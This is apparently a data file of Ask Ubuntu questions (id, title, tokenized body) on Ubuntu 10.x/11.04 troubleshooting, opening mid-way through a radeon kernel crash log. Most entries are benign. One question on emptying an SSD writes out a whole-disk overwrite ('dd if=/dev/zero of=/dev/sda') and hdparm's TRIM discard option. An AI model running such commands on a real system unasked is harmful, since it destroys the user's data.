] [ < c1009cde > ] ? restore_sigcontext+0xbe/0xe0 [ 480.884274 ] [ < c11421b7 > ] ? sys_ioctl+0x87/0x90 [ 480.884277 ] [ < c100ab5f > ] ? sysenter_do_call+0x12/0x28 [ 480.884280 ] -- - [ end trace 448eaf87bbc222a1 ] -- - [ 480.884287 ] [ drm ] disabling audio support [ 480.885369 ] radeon 0000:01:00.0 : gpu softreset [ 480.885372 ] radeon 0000:01:00.0 : r_008010_grbm_status=0xe57024e0 [ 480.885375 ] radeon 0000:01:00.0 : r_008014_grbm_status2=0x00110103 [ 480.885378 ] radeon 0000:01:00.0 : r_000e50_srbm_status=0x200000c0 [ 480.885385 ] radeon 0000:01:00.0 : r_008020_grbm_soft_reset=0x00007fee [ 480.900270 ] radeon 0000:01:00.0 : r_008020_grbm_soft_reset=0x00000001 [ 480.916147 ] radeon 0000:01:00.0 : r_008010_grbm_status=0xa0003030 [ 480.916149 ] radeon 0000:01:00.0 : r_008014_grbm_status2=0x00000003 [ 480.916152 ] radeon 0000:01:00.0 : r_000e50_srbm_status=0x200080c0 [ 480.917146 ] radeon 0000:01:00.0 : gpu reset succeed [ 480.920500 ] radeon 0000:01:00.0 : wb enabled [ 480.951456 ] [ drm ] ring test succeeded in 1 usecs [ 480.951462 ] [ drm ] ib test succeeded in 1 usecs [ 480.951463 ] [ drm ] enabling audio support [ 640.045683 ] nautilus [ 2821 ] : segfault at 20 ip b6b87fc2 sp bfe51e40 error 4 in libgobject-2.0.so.0.2800.6 [ b6b55000+45000 ] [ 662.069107 ] sysrq : sak [ 662.069139 ] sak : killed process 3405 ( xorg ) : task_session ( p ) ==tty- > session [ 662.069301 ] sak : killed process 3405 ( xorg ) : task_session ( p ) ==tty- > session [ 662.737841 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 663.636017 ] radeon 0000:01:00.0 : gpu lockup cp stall for more than 10052msec [ 663.636021 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 663.636045 ] warning : at /build/buildd/linux-2.6.38/drivers/gpu/drm/radeon/radeon_fence.c:248 radeon_fence_wait+0x2ea/0x360 [ radeon ] ( ) [ 663.636048 ] hardware name : inspiron 530 [ 663.636050 ] gpu lockup ( waiting for 0x0000c703 last fence id 0x0000c702 ) [ 663.636052 ] modules linked in : binfmt_misc parport_pc ppdev usblp snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_usb_audio snd_pcm snd_hwdep snd_usbmidi_lib snd_seq_midi snd_seq_midi_event snd_rawmidi snd_seq gspca_zc3xx snd_timer snd_seq_device gspca_main videodev radeon ttm drm_kms_helper psmouse serio_raw snd soundcore snd_page_alloc dcdbas drm lp i2c_algo_bit parport usbhid hid floppy e1000e [ 663.636086 ] pid : 3551 , comm : compiz tainted : g w 2.6.38-8-generic-pae # 42-ubuntu [ 663.636088 ] call trace : [ 663.636097 ] [ < c1058ce2 > ] ? warn_slowpath_common+0x72/0xa0 [ 663.636114 ] [ < f88f4f3a > ] ? radeon_fence_wait+0x2ea/0x360 [ radeon ] [ 663.636132 ] [ < f88f4f3a > ] ? radeon_fence_wait+0x2ea/0x360 [ radeon ] [ 663.636136 ] [ < c1058db3 > ] ? warn_slowpath_fmt+0x33/0x40 [ 663.636154 ] [ < f88f4f3a > ] ? radeon_fence_wait+0x2ea/0x360 [ radeon ] [ 663.636161 ] [ < c1076c70 > ] ? autoremove_wake_function+0x0/0x50 [ 663.636178 ] [ < f88f57c1 > ] ? radeon_sync_obj_wait+0x11/0x20 [ radeon ] [ 663.636187 ] [ < f84ae719 > ] ? ttm_bo_wait+0xd9/0x170 [ ttm ] [ 663.636210 ] [ < f890d8c2 > ] ? radeon_gem_wait_idle_ioctl+0x82/0xe0 [ radeon ] [ 663.636220 ] [ < f8788db1 > ] ? drm_ioctl+0x1e1/0x470 [ drm ] [ 663.636236 ] [ < f890d840 > ] ? radeon_gem_wait_idle_ioctl+0x0/0xe0 [ radeon ] [ 663.636241 ] [ < c110bd79 > ] ? handle_mm_fault+0x109/0x190 [ 663.636244 ] [ < c1534fb0 > ] ? do_page_fault+0x0/0x490 [ 663.636246 ] [ < c15351df > ] ? do_page_fault+0x22f/0x490 [ 663.636254 ] [ < f8788bd0 > ] ? drm_ioctl+0x0/0x470 [ drm ] [ 663.636257 ] [ < c1141ecb > ] ? do_vfs_ioctl+0x7b/0x2e0 [ 663.636259 ] [ < c11421b7 > ] ? sys_ioctl+0x87/0x90 [ 663.636262 ] [ < c100ab5f > ] ? sysenter_do_call+0x12/0x28 [ 663.636264 ] -- - [ end trace 448eaf87bbc222a2 ] -- - [ 663.636272 ] [ drm ] disabling audio support [ 663.637335 ] radeon 0000:01:00.0 : gpu softreset [ 663.637337 ] radeon 0000:01:00.0 : r_008010_grbm_status=0xe57024e0 [ 663.637340 ] radeon 0000:01:00.0 : r_008014_grbm_status2=0x00110103 [ 663.637342 ] radeon 0000:01:00.0 : r_000e50_srbm_status=0x200010c0 [ 663.637350 ] radeon 0000:01:00.0 : r_008020_grbm_soft_reset=0x00007fee [ 663.652234 ] radeon 0000:01:00.0 : r_008020_grbm_soft_reset=0x00000001 [ 663.668109 ] radeon 0000:01:00.0 : r_008010_grbm_status=0xa0003030 [ 663.668111 ] radeon 0000:01:00.0 : r_008014_grbm_status2=0x00000003 [ 663.668113 ] radeon 0000:01:00.0 : r_000e50_srbm_status=0x200080c0 [ 663.669107 ] radeon 0000:01:00.0 : gpu reset succeed [ 663.672556 ] radeon 0000:01:00.0 : wb enabled [ 663.703517 ] [ drm ] ring test succeeded in 1 usecs [ 663.703524 ] [ drm ] ib test succeeded in 1 usecs [ 663.703527 ] [ drm ] enabling audio support any help appreciated
42218	how to configure firewall	how can i configure firewall for what i use as a web development server . i should be blocking all ports except 80 ( http ) , ftp , ssh ? i tried configuring using ufw , gufw , firestarter but i ended up blocking myself from surfing the net ... : )
42223	app to restart after suspend|hibernate - defined in upstart ?	i want an app to re-start ( xbmc , but i failed with firefox and krusader doing this , too ) , after the pc wakes from suspend or hibernate . i want to write a script , which runs at the same conditions , and checks the network i am connected to , and execute . ( mount my nfs ) i tried with sudo touch /etc/pm/sleep.d/99_restartxbmc sudo chmod a+x /etc/pm/sleep.d/99_restartxbmc sudo nano /etc/pm/sleep.d/99_restartxbmc and # ! /bin/bash case `` $ 1 '' in thaw ) killall -9 xbmc.bin ; ; sleep 5 ; ; /usr/bin/xbmc ; ; * ) ; ; esac exit $ ? but xbmc will not start ( firefox and krusader , too ) so , i want to define an upstart script , that will execute after system resume ( from hibernate or sleep ) i want to be something like start on xxxxx ( xxx should be start from hibernate or sleep ) dont if it is possible to make something like that , anf if so how to define correctly the xxxxx condition start on system resume ? ? ? ? start on system thaw ? ? ?
42227	how do i force apt-get to update the state of package versions ?	i installed natty narwhal last night , and cam across a problem with update manager . i had initially instructed update manager to `` install updates '' , but the dialog that popped up stayed on `` waiting ... '' with no progress for over 5 minutes . i pressed cancel , hoping to exit update manager and try again , but after the update manger updated , it claims i have a completely updated system , with no packages left to install . when update manager first popped up after installation , i had approx . 84 . how can i force apt-get ( as i get the same `` no updates '' message there ) to re-build the status of all my packages ? i tried the solution below with sudo dpkg -- configure -a , but that ran without output , and i 'm still not sure the packages advertised previously have been installed . sudo apt-get update & & apt-get upgrade only gave me some updates to chromium .
42231	how do i put netbook edition on my new acer aspire one d255 ?	i 'm going on a 9 month round the world trip and i have just bought an acer netbook to keep me company . i 'll be mainly using it to update my blog , keep in touch with family and friends , upload photos , update my iphone etc . it has come with windows 7 starter pre-loaded , which is fine , and i have the option to dual boot into android if i want , but i would rather use ubuntu netbook edition , as i have been using ubuntu on my laptop for about the last 5 years . however from looking on the ubuntu website it is n't clear how i can do this . can anyone explain , in a step by step , easy to understand and uncomplicated way ( for a non-geek ) how i can download and install netbook edition please ? i 'd be really grateful . huge thanks in advance , kat x x
42234	how much do canonical track ubuntu one-users behaviour ?	i realised today when signing in , that everytime i use my computer i send some data back and forth to the ubuntu one service , for obvious reasons , and that would actually mean canonical could save us users data , like when we use our computers and how , and ( if the ubuntu one-folder on the server ai n't encrypted in a good manner ) what content we want to save in the cloud , and since ubuntu one is not open source , we , the community , ca n't check if canonical logs more than we are comfortable with . do n't get me wrong , i 'm no conspiracy nut , just courious : ) .
42236	unable to login into my user account	all of a sudden i am unable to login into my user account . i have activated root account and i am able to login into that root account , however i cant able to login into my user account . i am very sure it is not a password error . when i login into my user account the screen flickers and again it is showing the login screen . some times a popup appears in the top right corner as you see below . can anyone help me to solve this problem ? i have posted this same question in ubuntuforums also but still no solutions helped me . i hope someone here will solve this issue .
42237	ogg music files glitch in banshee	i have a music library of mainly ogg files . i recently moved to a fresh install of ubuntu 11.04 . i 've tried playing these ogg files in banshee ( and rhythmbox ) but every 20s or so there is a glitch in the music . it feels like a skip except it does n't move the read head . the music can be played without error when imported into audacity and i have not noticed this glitch in banshee with any of my mp3 files . i would like to know what audacity is doing right that banshee ( and rhythmbox ) are doing wrong . i would also ideally want to know how to fix this without reripping my entire library into mp3 or relying on audacity as a media player .
42238	err : file '/lib/libgcc_s.so.1 ' not found	i 'm running 32bit ubuntu in a virtual machine inside vmplayer . that file simply does n't exist , what do i do ?
42239	how do i run angry birds ?	i see that there is an html version of angry birds . how do i use it ? i 'd also like to have the icon on my launcher so i can run it as it 's own application .
42248	is wine an emulator or compatibility layer ?	yesterday , i had a hot discussion with one of my friend ( windows user ) . he said wine is just an emulator . i said no wine is read as `` wine is not an emulator '' . then he gave me many links including winehq 's wiki page . `` wine 's not that kind of emulator '' is written there . so i want to ask if wine is an emulator why does it calls itself `` wine is not an emulator '' ?
42253	find and bash problems in recent ubuntu versions	i 've been having a problem the last six months or so when combining searches in bash . the exact example is related to python programming but would apply to any kind of detection/manipulation . suppose i want a list of all python files in the directory where i am . this is easy : find . -name '*.py' now , suppose i 'm only interested in those python files which contain the string `` psycopg '' , e.g . because i want to transition from the old postgresql access library psycopg to psycopg2 . still easy enough : grep -l psycopg `find . -name '*.py'` now , suppose i want to do a full list of these files to inspect their date stamps to see when i last touched them . i could also wish to open them in gedit , but let 's stick to the list : ls -l ` ! ! ` which expands to ls -l `grep -l psycopg `find . -name '*.py ' `` now , what happens ? answer : nothing . the bash prompt just hangs . why is that ? this may be a wrong way of doing things , but it used to work . i 'm pretty sure it worked pre- ubuntu 10.10 or 10.04 .
42258	set compiz keybindings to `` low priority ''	so heres an interesting problem . i am using rubymine , but this applies to any editor . there are key bindings in the editor which make perfect sense and are useful . however compiz in it 's infinite wisdom decides that it wants to take the key bindings if it sees them . example is alt + ctrl + left/right as prev/next location . compiz instead wants to switch workspaces . how do i tell compiz to not execute commands on keybindings if another program handles them ? sort of a `` low priority ''
42265	how can i stop the panel from showing on an external projector/monitor ?	in ubuntu 10.10 ( and possibly previous versions ) , when i connected my laptop to an external source ( monitor/projector ) and set it not to clone my desktop the display on the external source would not show the ( gnome- ) panel ( just a full-screen desktop with no icons ) . since upgrading to ubuntu 11.04 ( using unity ) when i now connect the external source has the panel on there . is there any way to revert to the previous behaviour in 11.04 ?
42266	what is the recommended way to empty a ssd ?	i 've just received my new ssd since the old one died . this intel 320 ssd supports trim . for testing purposes , my dealer put malware , err , windows on it . i want to get rid of it and install kubuntu on it . it does not have to be a `` secure wipe '' , i just need the empty the disk in the mosy healthy way . i believe that dd if=/dev/zero of=/dev/sda just fills the blocks with zeroes and thereby taking another write ( correct me if i 'm wrong ) . i 've seen the answer how to enable trim , but it looks like it 's suited for clearing empty blocks , not wiping the disk . hdparm seems to be the program to do it , but i 'm not sure if it clears the disk or cleans empty blocks . from its manual page : -- trim-sector-ranges for solid state drives ( ssds ) . exceptionally dangerous . do not use this option ! ! tells the drive firmware to discard unneeded data sectors , destroying any data that may have been present within them . this makes those sectors available for immediate use by the firmware 's garbage collection mechanism , to improve scheduling for wear-leveling of the flash media . this option expects one or more sector range pairs immediately after the option : an lba starting address , a colon , and a sector count , with no intervening spaces . exceptionally dangerous . do not use this option ! ! e.g . hdparm -- trim-sector-ranges 1000:4 7894:16 /dev/sdz how can i make all blocks appear as empty using trim ?
42272	when and where i can find the uds-o group photos ?	i think the question title is enough information .
42275	display notifyosd notifcations in conky ?	i want to display the latest notifyosd notification in conky , i can display the entire file with $ { execi 30 cat ~/.cache/notify-osd.log } but is it possible to show only the last line of the file ? and get it to periodically check the log for changes to the last line ?
42278	change default `` open with '' for documents directory	my documents directory is automatically open with vlc . how can i change this so that i can see my .doc files in ubuntu 11.04 ?
42281	change default 'open with ' for document folder	sorry i meant my documents folder opens with vlc and not vcr as i said in my previous question .
42283	pygtk - events from gtk.menu in unity global menu	i have an gui application written in pygtk and need to read key-press/release events from application menu . for example , when pressing shift key and click on menu item , do something else , then ordinary . gtk.menu implement this signals and it works very well for the application , until unity move the menu to panel - no more events from menu . i 'm not willing to redesign gui because of unity , hope there 's a better way . thanx in advance for any hint .
42284	what is the ubuntu `` built in virus protection '' ?	at ubuntu.com there is this `` only in ubuntu '' that says `` built in virus protection '' : what is the ubuntu built it protection ? what is the program in charge of this and how does it work ?
42286	how do i display japanese characters with default fonts ?	in a fresh install of 11.04 natty , japanese characters ( kanji , some kana ) were still not displaying correctly in urls and after i followed the instructions for installing japanese language support . urls , for example , were still displaying as boxes . this was regardless of whether i was using an english or japanese session . my workaround was to set the system/app/desktop fonts in appearance to the 'takao ' fonts . however , this feels suboptimal -- i remember just displaying east asian languages being much easier in the past . what 's the deal ? do the fonts packaged with natty ( ubuntu , sans et al . ) no longer support east asian languages like japanese ?
42296	headphone sound not working after 11.04 upgrade	after upgrading to 11.04 my external speakers on my asus eee pc netbook still work however there is no sound output from the headphone jack . aplay -l | grep card card 0 : intel [ hda intel ] , device 0 : alc269 analog [ alc269 analog ] sudo lsmod | grep snd snd_hda_codec_realtek 255820 1 snd_hda_intel 24140 4 snd_hda_codec 90901 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13274 1 snd_hda_codec snd_pcm 80244 3 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25269 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51291 2 snd_seq_midi , snd_seq_midi_event snd_timer 28659 2 snd_pcm , snd_seq snd_seq_device 14110 3 snd_seq_midi , snd_rawmidi , snd_seq snd 55295 16 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd snd_page_alloc 14073 2 snd_hda_intel , snd_pcm
42300	remember `` open location '' for next time ?	i 'm accustomed to clicking on the desktop , then typing ^l to get the open location window into which i then type ssh : //some-domain . this works , i get to muck with my files there . what i want is not to have to type this address in each time -- particularly since the newly opened window times out so quickly and shuts down ( making me perform this action all over again every 10 minutes or so ) . i would like to know how this dialog might remember what i type from time to time or how to make nautilus ( ? ) leave my window open until i 'm done with and close it . thanks , russ bateman
42304	how to set grub2 to recognize xubuntu as xubuntu and not as ubuntu ?	i have installed ubuntu 11.04 on my laptop . and now i wanted to try xubuntu and lubuntu ( both version 11.04 ) . and when i installed xubuntu and lubuntu , grub2 recognize them both as ubuntu instead of xubuntu and lubuntu . any help is appreciated .
42305	how to install gpro organiser ?	i 'm a newbie ubuntu user . i 'm using ubuntu 's latest version ( 11.04 ) . i 'm a gpro player and there is an application , gpro organiser . this application for windows and needs .net frameworks . but some player , using gpro organiser on ubuntu with wine and mono . so i installed wine and mono and then install organiser with wine . now i can see gpro organiser in application list but it 's not opening . i 'm clicking it but nothing happened . maybe i could n't install mono , properly . i 'm a newbie ubuntu user , because of this can you explain me step by step what should i do ? thank you . note : question edited after @ aukik 's answer there is a little problem , orginally , on application 's settings page , there are a few checkboxes . but now this checkboxes are disappering i can see just labels . ( i 'm talking about this screen : 89484848.dk/gpro/phpmanual/pics/settings_online.jpg , i can see labels but i ca n't see checkboxes . screenshot . ( i ca n't see checkboxes but i can click them : ) because when i click left of labels , apply button appearing : d )
42307	keeping the nvidia cuda driver in sync with kernel updates	does anybody know if it 's possible to automatically reinstall the nvidia cuda driver on kernel updates ? as of know i need to switch to a console and run the driver installer manually on kernel updates , so it would be great if it was possible to keep it in sync in the same fashion as the regular proprietary drivers . i guess i could hack together a script that checks if the module is loaded and runs the installer if not , but is there a more elegant solution ?
42310	uninstall nvidia drivers ?	i 've upgraded from 10.04 to 10.10 ( in order to be able to upgrade to 11.04 ) . it seems like the current graphics drivers are incompatible with the latest kernel i have . i do n't know if i have installed drivers only from apt or if i have downloaded . i think it 's only apt thou . how do i uninstall all nvidia drivers and revert to the default drivers ? i 've used at least 2 different multi monitor setup utilities , but it was last year so i do n't remember much . what config files do i need to change so that the default drivers works ?
42312	run.x86-linux always at 100 % cpu	i have my computers left open for 2 days . the last few hours when running the top command i get back these results : top - 20:51:39 up 1 day , 7:22 , 4 users , load average : 1.38 , 1.64 , 1.53 tasks : 179 total , 2 running , 173 sleeping , 0 stopped , 4 zombie cpu ( s ) :100.0 % us , 0.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 1017176k total , 792072k used , 225104k free , 44676k buffers swap : 1614492k total , 197084k used , 1417408k free , 325896k cached unknown command - try 'h ' for help pid user pr ni virt res shr s % cpu % mem time+ command 20925 monra 20 0 17252 11m 548 r 103 1.1 16:26.47 run.x86-linux 22095 monra 20 0 2548 1240 924 r 103 0.1 0:00.02 top 1 root 20 0 2800 1144 740 s 0 0.1 0:00.80 init as you see the program run.x86-linux is eating 100 % cpu . why is this ? is there any way to fix it without restarting the computer ?
42316	can i get rid of the launcher in unity ?	just wondering if i can get rid of the launcher in the unity desktop and replace it by something else ?
42321	when i kill xserver it causes a random process , usually compiz , to use 100 % of a cpu core	i do n't have any more clues , unfortunately every time i force a logout ( control-alt-backspace i mean ) and login again , a random process uses 100 % of a cpu core , usually compiz or nautilus
42325	can i disable ubuntu one syncing for open documents ?	a standard feature of most of the document editors like texmaker or kile is auto-saving as you type . of course this is generally considered a good thing , but if i 'm editing a document that 's already synced with ubuntu one , ubuntu one syncs the file every time the editor auto-saves . in addition to eating resources , this also usually results in u1conflict files , and at some point i have to log into ubuntu one via a web browser to remove the file ( there are problems building the pdf from the tex source otherwise ) . i know i can temporarily disable ubuntu one , or temporarily move the document being edited to a folder that 's not synced , but it 's a bit of a pain to have to take these extra steps every time i want to work on a paper . is there some way to maybe write a script to disable ubuntu one automatically while a file is open , and wait until i 'm finished editing before syncing ?
42331	xubuntu keeps resetting workspace count to 1	i 've just installed xubuntu 11.04 on my netbook and i 'm noticing a problem with the workspace setup . if i log in , i see there 's only one workspace specified . if i load the 'workspaces ' control panel widget and alter it to 4 , this works fine until i reboot and log in again , at which point the number of workspaces is reset to 1 . how do i get xfce4 to remember my workstation number preference ?
42332	dual monitor window management	i have two displays : 4 desktop spaces ( the wall ) having 2 displays each . if i unplug the second monitor , then all windows move quite strange . i place 8 windows : 1 and 2 on the first desktop space on the left and right screen , 3 and 4 on the second space on the two screens etc . [ 1 ] [ 2 ] | [ 3 ] [ 4 ] | [ 5 ] [ 6 ] | [ 7 ] [ 8 ] note that i have each window maximized , otherwise their movements are completely unpredictable ( not even in the way i describe below ) . i expect the behaviour as in 10.10 : if i unplug the second monitor , then each desktop space 'shrinks ' and i get windows 1 and 2 on the first desktop , 3 and 4 -- on the second one etc . [ 12 ] | [ 34 ] | [ 56 ] | [ 78 ] what happens : the first space now have windows 1 and 3 , the second one has 2 and 4 , etc [ 13 ] | [ 24 ] | [ 57 ] | [ 68 ] ( there is another issue that if you press alt+tab after you unplug the monitor you can not even see all the windows moved to the workspace until you walk around other spaces , but maybe that is another glitch not related ) now , the more wierd stuff happens when i plug the second monitor back : i get all windows on the first space : some of them on the first display and others on the second display : [ 13 ] [ 245678 ] | [ ] [ ] | [ ] [ ] | [ ] [ ] or another time : [ 13468 ] [ 257 ] | [ ] [ ] | [ ] [ ] | [ ] [ ] this worked more intuitively in 10.10 . any way to get it back ? p.s . in compizconfig > desktop > expo > appearance i have multi output mode = one wall per output . when i changed it to another value -- the same thing happens , but i am not sure unity uses this parameter at all .
42334	create os back up	hello i have ubuntu 9 that i take with my dell laptop ! this cd contain a program that i can create a copy of all ubuntu files & programs into a cd and run it from cd ( live ) or intslall it ( with all programs ) new i installed ubuntu 10 that i downloaded from ubuntu website , i installed dozens of programs from apache to games , from browser to code editor ) , now i want to create back up of my ubuntu that i able to run it from cd or installed it ( and installed ubuntu include my prgrams ) now i want to now is there any program for my purpose ? note : i could not find any dell related program , if there is any , it will be better to use it : )
42336	why does my computer turn off and reboot every half hour ?	after updating to ubuntu 11.04 my computer started to turn off and reboot . this happens about every half hour , i think there is a tendency for it to happen when i work with multiple applications at once . it is both my desktop and laptop . i have installed boine manager , playonlinux , gimp , qt , wine , vlc-player and blender . otherwise is all as default . see my /var/log/kern.log.1 here : http : //paste.ubuntu.com/608690 when i run memtest 86+ i get this error :
42338	`` cron : module is unknown '' after upgrading to 10.04	i just upgraded our server to ubuntu 10.04 and cron just stopped working . i tried to restart the server , restart cron but nothing worked for me . it just reports in /var/log/syslog : may 12 16:32:01 uhor cron [ 8424 ] : module is unknown may 12 16:33:01 uhor cron [ 8430 ] : module is unknown may 12 16:33:01 uhor cron [ 8429 ] : module is unknown may 12 16:34:01 uhor cron [ 8432 ] : module is unknown do you have any idea what 's wrong ? some people were reporting also module is unknown error after upgrading but it was usually with passwd command , not with cron . this is my /etc/pam.d/cron # # the pam configuration file for the cron daemon # @ include common-auth # read environment variables from pam_env 's default files , /etc/environment # and /etc/security/pam_env.conf . session required pam_env.so # in addition , read system locale information session required pam_env.so envfile=/etc/default/locale @ include common-account @ include common-session-noninteractive # sets up user limits , please define limits for cron tasks # through /etc/security/limits.conf # session required pam_limits.so i guess there might be something wrong with my pam_* files , but i tried to reinstall them and it did n't help .
42340	how to delete apps and files & folder ( lenses ) icons from launcher ?	hi there , i 've been looking for some information about how to delete those icons ( applications and files & folders ) . why ? simple , because i understand that ubuntu 's button ( bfb ) it 's a better solution , i can reach to the same options and i understand that there is not any good reason for have 3 different buttons for the same target . from bfb i can find apps , files , folders . deleting those items ( i 've proposed into ayatana ) we recover more space , good space . so , do you know how to delete theme , or just hide them ? thanks ! martă­n .
42341	zeitgeist-extension-fts cant seem to install after upgrade from 10.04 to 10.10	okay folks , hope all is well in which ever part of the world you are in , i seem to be having a bit of an issue with unity-place-applications & unity-place-files . i have just updated from 10.04 to 10.10 trying to take baby steps on my way to natty anyways the offending party seems to be a dependency which is zeitgeist-fts-extension an attempt to correct things with sudo apt-get install -f / sudo apt-get install zeitgeist-fts-extension -f does n't work , i have attempted to use software center , synaptic and all the terminal knowledge i can master but alas i keep getting the error : the following new packages will be installed : zeitgeist-fts-extension 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0b/9,280b of archives . after this operation , 86.0kb of additional disk space will be used . ( reading database ... 289477 files and directories currently installed . ) unpacking zeitgeist-fts-extension ( from ... /zeitgeist-fts-extension_0.0.6-0ubuntu1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/zeitgeist-fts-extension_0.0.6-0ubuntu1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/zeitgeist/_zeitgeist/engine/extensions/fts.py ' , which is also in package zeitgeist-extension-fts 0.0.1~bzr20100717-0ubuntu1~ppa1~lucid errors were encountered while processing : /var/cache/apt/archives/zeitgeist-fts-extension_0.0.6-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) now i see a reference to lucid though a quick check with my sources list reveals that all seems well and only maverick is in charge of things . /*cant post sources.list too much html hyperlinks */ now i am at a loss because i can not fix this and would really like to so i can move on and try out some other stuff any help will be greatly appreciated , thanks : ) buyo
42344	how do i change the browser that gnome terminal opens links with ?	i 'd like gnome-terminal to open links with the chrome browser , but it insists on opening them with firefox . i 've followed both pieces of advice found here without any success : http : //www.linuxquestions.org/questions/slackware-14/gnome-terminal-default-browser-332934/ my os is ubuntu 10.04 .
42347	trying to use webex from webex.com on firefox 4 ?	i have previously seen webex working with firefox 3 on the same install of ubuntu , i have the sun java6 packages installed including the plugin for mozilla . ( sun-java6-bin sun-java6-jre sun-java6-plugin ) i do not have any of the icedtea packages or openjdk packages installed . what am i missing ?
42349	is there a bug report tracking the power regression in the 2.6.38 kernel ?	i 'm looking for an official bugtracker entry ( either ubuntu , or kernel ) which tracks the story of power usage regression described in : http : //www.phoronix.com/scan.php ? page=article & item=linux_mobile_uffda http : //www.phoronix.com/scan.php ? page=article & item=ubuntu_natty_power i could n't find any actual links or articles about resolution of the problem . any pointers to official sources would be appreciated .
42351	system does n't boot unless i hit enter	i 'm trying to remove a ~40 seconds pause that happens when my ubuntu machine starts . during this pause , all i see is a magenta rectangle ( approx 80 % of screen size ) over a black background . the gap is clearly visible on my bootchart ( not using an img tag here because the image is too high ) : http : //dl.dropbox.com/u/18558160/syrius-natty-20110512-1.png i also see a gap on my syslog . it seems to be related with the `` video device '' ( i 've got an nvidia ) . ... may 12 23:15:14 syrius kernel : [ 1.544436 ] tcp reno registered may 12 23:15:14 syrius kernel : [ 1.544447 ] udp hash table entries : 4096 ( order : 5 , 131072 bytes ) may 12 23:15:14 syrius kernel : [ 1.544491 ] udp-lite hash table entries : 4096 ( order : 5 , 131072 bytes ) may 12 23:15:14 syrius kernel : [ 1.544593 ] net : registered protocol family 1 may 12 23:15:14 syrius kernel : [ 42.870179 ] pci 0000:06:00.0 : boot video device may 12 23:15:14 syrius kernel : [ 42.870222 ] pci : cls 64 bytes , default 64 may 12 23:15:14 syrius kernel : [ 42.871588 ] pci-dma : disabling agp . may 12 23:15:14 syrius kernel : [ 42.871697 ] pci-dma : aperture base @ c4000000 size 65536 kb what can i do to fix this ? it did n't happen on ubuntu 10.10 . i 've done some more tests . it seems that the boot sequence requires some sort of input while booting ( ? ) it turns out that it 'll not boot until i press enter ( the magenta rectangle stays in the screen forever unless you press enter ) any ideas ? thanks !
42353	move left launcher to another monitor	i use a large monitor as primary and laptop screen as secondary . is it possible to move the launcher to my big monitor or do i have to turn off my laptop monitor ? `` monitor preferences '' ( launcher search - > `` monitors '' ) does not have a way to set the default/primary monitor . nvidia-settings which i just installed says `` you do not appear to be using the nvdia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . sudo nvidia-xconfig says sudo : nvidia-xconfig : command not found . i guess i do n't have an amd driver because i do n't have `` amd catylist control center '' in the launcher search .
42362	disk errors when booting , system does n't run properly after disk check	i 'm using 11.04 on dell vostro 1000 laptop . for some time it was ok , but now ubuntu usually fails to boot . after selecting ubuntu in grub , i usually see purple ( plain , without logo ) or black screen for some minutes until the login screen appears . i normally chose the user and type my password . then , i see the default wallpaper ( although i had changed it ) , that is left from login screen and , after about 1 minute the dash and the top panel appears . the wallpaper is still default , the dash is working , but very slowly , or maybe not everything is working , the panel , or only applets , is n't working . ( i see ubuntu is trying to paint the effects of pressing an applet , but nothing more is happening ) . finally the screen becomes black with a small square on the bottom right corner . i turn off the computer . then : i turn it on , choose ubuntu , after some time i see that my disk is being checked for errors . then i get an suggestion to press 'f ' and fix the errors . so i press , then wait for some time ( the disk drive for /tmp is not ready yet or not present ) , my computer is restarting and everything is working perfectly except the only username is showed in login screen and i have to type mine . however , the next time i turn on the computer , i get the first variant ( or at least something very similar ) . this has repeated several times - actually ubuntu becomes useless with a such error . do you have any suggestions how it would be possible to fix this error ? thank you very much .
42365	how do i get wireless working on a dell inspiron 510m ?	why wifi do n't work in my dell inspiron 510m with ubuntu 10.04 ? is that usefull ? inspiron @ inspiron : ~ $ rfkill list all inspiron @ inspiron : ~ $ sudo lshw -c network [ sudo ] password for inspiron : *-network:0 disabled description : wireless interface product : pro/wireless lan 2100 3b mini pci adapter vendor : intel corporation physical id : 3 bus info : pci @ 0000:01:03.0 logical name : eth1 version : 04 serial : 00:0c : f1:5b:5d:40 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ipw2100 driverversion=git-1.2.2 firmware=712.0.3:3:00000001 latency=32 link=no maxlatency=34 mingnt=2 multicast=yes wireless=unassociated resources : irq:5 memory : fcffe000-fcffefff *-network:1 description : ethernet interface product : 82801db pro/100 ve ( mob ) ethernet controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:01:08.0 logical name : eth0 version : 81 serial : 00:11:43:41 : d8 : b8 size : 10mb/s capacity : 100mb/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=half firmware=n/a ip=192.168.0.2 latency=32 link=no maxlatency=56 mingnt=8 multicast=yes port=mii speed=10mb/s resources : irq:11 memory : fcffd000-fcffdfff ioport : ecc0 ( size=64 ) inspiron @ inspiron : ~ $ iwconfig wlan0 wlan0 no such device inspiron @ inspiron : ~ $ ifconfig -a eth0 link encap : ethernet endereço de hw 00:11:43:41 : d8 : b8 inet end . : 192.168.0.2 bcast:192.168.0.255 masc:255.255.255.0 up broadcast multicast mtu:1500 métrica:1 pacotes rx:0 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:0 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet endereço de hw 00:0c : f1:5b:5d:40 broadcast multicast mtu:1500 métrica:1 pacotes rx:0 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:0 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 